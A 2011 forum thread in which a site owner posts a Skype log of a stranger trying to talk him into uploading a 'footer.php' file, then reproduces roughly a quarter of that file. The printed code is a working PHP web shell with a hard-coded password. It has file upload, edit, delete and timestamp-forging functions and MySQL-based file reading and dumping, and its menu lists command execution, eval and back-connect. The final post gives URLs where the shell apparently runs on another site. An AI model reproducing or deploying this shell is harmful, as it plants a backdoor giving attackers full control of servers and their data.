PLA Forums
Other Stuff That Has Little To Do With PLA => General Discussions => Topic started by: rbcp on June 10, 2011, 02:35:42 PM
-
Some guy added me on Skype today and began trying to call me for an hour straight. After telling him I couldn't pick up, I'm not sure what happened, but I'm pretty sure our forums have a new admin. Welcome to the team, Bilgiislen!
Brad Carter 2:34 PM sorry, i can't pick up right now
BİLGİİSLEM KEMAL 2:35 PM facebook fan pages are the web site have liked it very much would like to give you support
Brad Carter 2:35 PM thanks
BİLGİİSLEM KEMAL 2:36 PM We know web design your page I want to be my manager
I want to be my page, the administrator have knowledge of web design
Brad Carter 2:37 PM i don't understand anything you're saying
BİLGİİSLEM KEMAL 2:38 PM http://www.phonelosers.com/index.php
you web site ?
Brad Carter 2:39 PM yes
BİLGİİSLEM KEMAL 2:39 PM I want to be the website administrator
Brad Carter 2:40 PM why?
BİLGİİSLEM KEMAL 2:40 PM I am interested in my page to bring the fans on Facebook members multiplies
Brad Carter 2:42 PM Thank you, but we've already got people running that web site
BİLGİİSLEM KEMAL 2:43 PM I want to be with you
Brad Carter 2:43 PM I don't swing that way, baby
BİLGİİSLEM KEMAL 2:43 PM Would you make something for me well
In a tiny thing
???
Brad Carter 2:48 PM I don't know what you're asking
BİLGİİSLEM KEMAL 2:49 PM Do you have a server that installs a small php file
Brad Carter 2:50 PM Why yes I do!
BİLGİİSLEM KEMAL is sending you a file 2:50 PM footer.php
BİLGİİSLEM KEMAL 2:50 PM this file
can change the name of the
Once installed, you give the url address
Brad Carter 2:52 PM This seems like the worst idea ever.
BİLGİİSLEM KEMAL 2:52 PM No, but you certainly could swear
I just want you to do so after 1 hour my server does not delete
Brad Carter 2:53 PM Monkeys kidnapped my grandparents and I have to wait at the pay phone at 5:00
BİLGİİSLEM KEMAL 2:54 PM
Would you please be so kind you can throw and then delete the file again, I get it now
and I'll do you as a gift to send to facebook fan page
Brad Carter 2:55 PM Watch me eat 450 hardboiled eggs.
BİLGİİSLEM KEMAL 2:55 PM I want something smallish
Brad Carter 2:55 PM Are you for panda rape?
BİLGİİSLEM KEMAL 2:56 PM No rape trial just do not care that my server does not
Brad Carter 2:56 PM What do you say we make apple juice and fax it to each other?
BİLGİİSLEM KEMAL 2:57 PM ???
Brad Carter 2:57 PM I have a sheep doing roofing over at my house. Why don't you drop in? We'll put on Zepplin and eat cheddar cheese.
BİLGİİSLEM KEMAL 2:57 PM of mine you're kidding
Brad Carter 2:57 PM Jesus is a raisen.
BİLGİİSLEM KEMAL 2:59 PM Could you upload the file?
Brad Carter 2:59 PM I already did
BİLGİİSLEM KEMAL 3:00 PM What is the address
Brad Carter 3:00 PM 1313 Mockingbird Lane, Los Angeles, CA 90210
BİLGİİSLEM KEMAL 3:00 PM no
file adresss
Brad Carter 3:01 PM What should I file the address under?
I have a manilla folder.
And a label maker.
BİLGİİSLEM KEMAL 3:02 PM I understand
http://www.phonelosers.com/.... ?
I gave the file which is installed in the folder
Brad Carter 3:02 PM I am copying the PHP code by hand on college ruled paper
I'm almost finished with it
BİLGİİSLEM KEMAL 3:03 PM Did you install the file server
Brad Carter 3:06 PM yes
what files are we going to server?
i will have a joyous time serving files
BİLGİİSLEM KEMAL 3:07 PM You can make it if we were loaded url
Brad Carter 3:07 PM I am loading the URL as we speak
My pen is out of ink
BİLGİİSLEM KEMAL 3:07 PM No kidding
You can make the file path
-
Be careful, he might be trying to trick you.
-
I am not too sure about panda rape, Sexual Harassment Panda says
"The first party of the first panda may sue the second-party panda unless that panda was said panda aforementioned panda"
http://www.youtube.com/watch?v=bN1xLgSlGpI
-
wow... that's a pretty amazing conversation
-
I want to see that PHP file he sent you...
-
I want to see that PHP file he sent you...
Here's part of it. It was 2,000 lines of code and it's too big to post here.
This is about 1/4th of it though. I just skimmed over it so I don't really
know what it does, but there's lots of file writing and directory creating.
/*****************************************************************************
===================== ÇëÎóÓÃÓÚ·Ç·¨ÓÃ;£¬Ôì³ÉÒ»Çкó¹ûÓë±¾ÈËÎŞ¹Ø¡£====================
·¢²¼´Ë°æ±¾ÊÇΪÁ˼ÍÄȫÌìʹÔø¾µÄ»Ô»Í¡£
¸ĞĞ»ÄãÃÇÓëÎÒһͬ×ß¹ı£ºSniper\Super¡¤Hei\kEvin1986\saiy\wofeiwo¡£
¸ĞĞ»ËùÓеÄÅóÓÑÃÇ¡¢ĞÖµÜÃÇ¡£¶àĞ»ÄãÃǵĹØĞĺÍÖ§³Ö£¡
Ñ¡ÔñÔÚ1ÔÂ7ÈÕ·¢²¼ÊÇΪÁ˼ÍÄîÎÒÀÏÆŵÄÉúÈÕ£¬Ô¤×£ÎÒÔÚ±¾ÃüÄêÀï¡£ÏÌÓã·Éí£¡
====================== ×îºóԤף°²È«ÌìʹµÄÿһλÅóÓÑ·É»ÆÌÚ´ï =======================
Codz by kodk3r(Muro)
Make in China
Web: http://www.TeknoWBH.Com
*****************************************************************************/
error_reporting(7);
@set_magic_quotes_runtime(0);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
//define('IS_WIN', strstr(PHP_OS, 'WIN') ? 1 : 0 );
define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
define('IS_COM', class_exists('COM') ? 1 : 0 );
define('IS_GPC', get_magic_quotes_gpc());
$dis_func = get_cfg_var('disable_functions');
define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
@set_time_limit(0);
foreach(array('_GET','_POST') as $_request) {
foreach($$_request as $_key => $_value) {
if ($_key{0} != '_') {
if (IS_GPC) {
$_value = s_array($_value);
}
$$_key = $_value;
}
}
}
/*===================== ³ÌĞòÅäÖà =====================*/
$admin = array();
// ÊÇ·ñĞèÒªÃÜÂëÑéÖ¤, true ΪĞèÒªÑéÖ¤, false Ϊֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎŞĞ§
$admin['check'] = true;
// Èç¹ûĞèÒªÃÜÂëÑéÖ¤,ÇëĞŞ¸ÄµÇ½ÃÜÂë
$admin['pass'] = 'muro1';
//ÈçÄú¶Ô cookie ×÷Ó÷¶Î§ÓĞÌØÊâÒªÇó, »òµÇ¼²»Õı³£, ÇëĞŞ¸ÄÏÂÃæ±äÁ¿, ·ñÔòÇë±£³ÖĬÈÏ
// cookie ǰ׺
$admin['cookiepre'] = '';
// cookie ×÷ÓÃÓò
$admin['cookiedomain'] = '';
// cookie ×÷Ó÷¾¶
$admin['cookiepath'] = '/';
// cookie ÓĞЧÆÚ
$admin['cookielife'] = 86400;
/*===================== ÅäÖýáÊø =====================*/
if ($charset == 'utf8') {
header("content-Type: text/html; charset=utf-8");
} elseif ($charset == 'big5') {
header("content-Type: text/html; charset=big5");
} elseif ($charset == 'gbk') {
header("content-Type: text/html; charset=gbk");
} elseif ($charset == 'latin1') {
header("content-Type: text/html; charset=iso-8859-2");
}
$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$timestamp = time();
/*===================== Éí·İÑéÖ¤ =====================*/
if ($action == "logout") {
scookie('phpspypass', '', -86400 * 365);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
if($admin['check']) {
if ($doing == 'login') {
if ($admin['pass'] == $password) {
scookie('phpspypass', $password);
p('<meta http-equiv="refresh" content="1;URL='.$self.'">');
p('<a style="font:12px Verdana" href="'.$self.'">Success</a>');
exit;
}
}
if ($_COOKIE['phpspypass']) {
if ($_COOKIE['phpspypass'] != $admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
/*===================== ÑéÖ¤½áÊø =====================*/
$errmsg = '';
// ²é¿´PHPINFO
if ($action == 'phpinfo') {
if (IS_PHPINFO) {
phpinfo();
} else {
$errmsg = 'phpinfo() function has non-permissible';
}
}
// ÏÂÔØÎļş
if ($doing == 'downfile' && $thefile) {
if (!@file_exists($thefile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$fileinfo = pathinfo($thefile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($thefile));
@readfile($thefile);
exit;
}
}
// Ö±½ÓÏÂÔر¸·İÊı¾İ¿â
if ($doing == 'backupmysql' && !$saveasfile) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
$table = array_flip($table);
$result = q("SHOW tables");
if (!$result) p('<h2>'.mysql_error().'</h2>');
$filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql');
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata .= sqldumptable($currow[0]);
}
}
mysql_close();
exit;
}
// ͨ¹ıMYSQLÏÂÔØÎļş
if($doing=='mysqldown'){
if (!$dbname) {
$errmsg = 'Please input dbname';
} else {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
if (!file_exists($mysqldlfile)) {
$errmsg = 'The file you want Downloadable was nonexistent';
} else {
$result = q("select load_file('$mysqldlfile');");
if(!$result){
q("DROP TABLE IF EXISTS tmp_kodk3rMuro;");
q("CREATE TABLE tmp_kodk3rMuro (content LONGBLOB NOT NULL);");
//ÓÃʱ¼ä´ÁÀ´±íʾ½Ø¶Ï,±ÜÃâ³öÏÖ¶ÁÈ¡×ÔÉí»ò°üº¬__kodk3rMuro_1111111111_eof__µÄÎļşÊ±²»ÍêÕûµÄÇé¿ö
q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_kodk3rMuro FIELDS TERMINATED BY '__kodk3rMuro_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__kodk3rMuro_{$timestamp}_eof__';");
$result = q("select content from tmp_kodk3rMuro");
q("DROP TABLE tmp_kodk3rMuro");
}
$row = @mysql_fetch_array($result);
if (!$row) {
$errmsg = 'Load file failed '.mysql_error();
} else {
$fileinfo = pathinfo($mysqldlfile);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header("Accept-Length: ".strlen($row[0]));
echo $row[0];
exit;
}
}
}
}
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gbk">
<title><?php echo str_replace('.','','#K.o.d.k.3.r. P.H.P. W.e.b. S.h.e.l.l. J.u.st. f.o.r. f.u.n B.y #.C.y.b.e.r.H.a.c.k.e.r.s:) ');?></title>
<style type="text/css">
body,td{font: 12px Arial,Tahoma;line-height: 16px;}
.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
.bt {border-color:#b0b0b0;background:#33CCFF;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
a {color: #00f;text-decoration:underline;}
a:hover{color: #f00;text-decoration:none;}
.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}
.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}
.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}
.head td span{font-weight:normal;}
form{margin:0;padding:0;}
h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#006666;}
ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
</style>
<script type="text/javascript">
function CheckAll(form) {
for(var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
}
function $(id) {
return document.getElementById(id);
}
function goaction(act){
$('goaction').action.value=act;
$('goaction').submit();
}
</script>
</head>
<body style="margin:0;table-layout:fixed; word-break:break-all">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr class="head">
<td><span style="float:right;"><a href="http://www.TeknoWbh.Com" target="_blank"><?php echo str_replace('.','','#Root@Suikast.İN');?> Version: 2010</a></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
</tr>
<tr class="alt1">
<td><span style="float:right;">Guvenli Mod:<?php echo getcfg('safe_mode');?></span>
<a href="javascript:goaction('logout');">CıkıS</a> |
<a href="javascript:goaction('file');">Dosya Yoneticisi</a> |
<a href="javascript:goaction('sqladmin');">MySQL Yoneticisi</a> |
<a href="javascript:goaction('sqlfile');">MySQL Yukle & INDIR</a> |
<a href="javascript:goaction('shell');">Yurutme Komutu</a> |
<a href="javascript:goaction('phpenv');">PHP Degisken</a> |
<a href="javascript:goaction('eval');">Eval PHP Kod</a>
<?php if (!IS_WIN) {?> | <a href="javascript:goaction('backconnect');">Geri Baglayin!</a><?php }?>
</td>
</tr>
</table>
<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
<?php
formhead(array('name'=>'goaction'));
makehide('action');
formfoot();
$errmsg && m($errmsg);
// »ñÈ¡µ±Ç°Â·¾¶
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}
$uedir = ue($dir);
if (!$action || $action == 'file') {
// Åж϶ÁĞ´Çé¿ö
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
// ɾ³ıĿ¼
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
}
}
// ´´½¨Ä¿Â¼
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}
// ÉÏ´«Îļş
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}
// ±à¼Îļş
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}
// ±à¼ÎļşÊôĞÔ
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}
// ¸ÄÃû
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}
// ¸´ÖÆÎļş
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}
// ¿Ë¡ʱ¼ä
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}
// ×Ô¶¨Òåʱ¼ä
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}
// ´ò°üÏÂÔØ
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}
// ÅúÁ¿É¾³ıÎļş
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished£¬choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
}
}
//²Ù×÷Íê±Ï
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
p('<h2>Dosya Yoneticisi - Suan disk bos '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)</h2>');
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
<form action="" method="post" id="godir" name="godir">
<tr>
<td nowrap>Gecerlı Dizin (<?php echo $dir_writeable;?>, <?php echo getChmod($nowpath);?>)</td>
<td width="100%"><input name="view_writable" value="0" type="hidden" /><input class="input" name="dir" value="<?php echo $nowpath;?>" type="text" style="width:100%;margin:0 8px;"></td>
<td nowrap><input class="bt" value="GO" type="submit"></td>
</tr>
</form>
</table>
-
WTF, why didn't you install the file like he asked? Jerk!
-
Ask him if he charges a monthly fee for admining. I need an admin to solve my issues when my computer pops up with a blue screen, it always tells me to contact my computer's administrator and I'm not sure at all who that is!
-
You should upload the entire file.
-
You should upload the entire file.
YOU'RE ONE OF THEM!
-
Make a fake site like phonewinnerz.org on a cheap host like hostbig.com and put the PHP file on it and see what happens.
-
The PHP is just a script to give him full access to your website and databases. Looks like something a hacker would drop onto a site.
-
The PHP is just a script to give him full access to your website and databases. Looks like something a hacker would drop onto a site.
LIES!!! You'll be hearing from BİLGİİSLEM KEMAL's lawyer regarding your slanderous post!!
-
You'd think having working knowledge of the mark's language would be the first step in SE... *rainbowsmiley*
-
You'd think having working knowledge of the mark's language would be the first step in SE... *rainbowsmiley*
Speaking the same language as the mark tends to help out quite a bit as well. If you can't convey your message clearly of what you want, you won't get it. :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense: :nonsense:
-
He couldn't use it unless he knew the URL to the file and smf doesn't allow direct file linking like that hence the sequence of numbers on the download files. It doesn't allow code execution that way either. It was used to hack smf a while back. So yes it's safe to upload it as an attachment. What a boring day...:p
-
He seemed like a nice guy. You really ought to be more trusting of people, rbcp. Shame on you. :nonsense:
-
so my evil plan didn't work?
-
(http://www.snorgtees.com/media/catalog/product/h/u/hugz_fullpic_1.jpg)
-
That gibberish code is insane! Any update on this one yet?
-
Just a PHP shell. Most of your shared hosting is going to take away any possibility of fun since the generally limit the system()/exec() commands. But it was nice of him to share his password.
-
But it was nice of him to share his password.
Haha... nice
-
Make in China
RBCP, shame on you for not trusting anonymous Chinese coders. They have only your best interests at heart.
In fact, it looks like he set up a test site to show you he's perfectly legit: http://www.nbppl.in/404/nullshell.php
And www.nbppl.in/404/kodk3r.php with the password he thoughtfully provided in the script.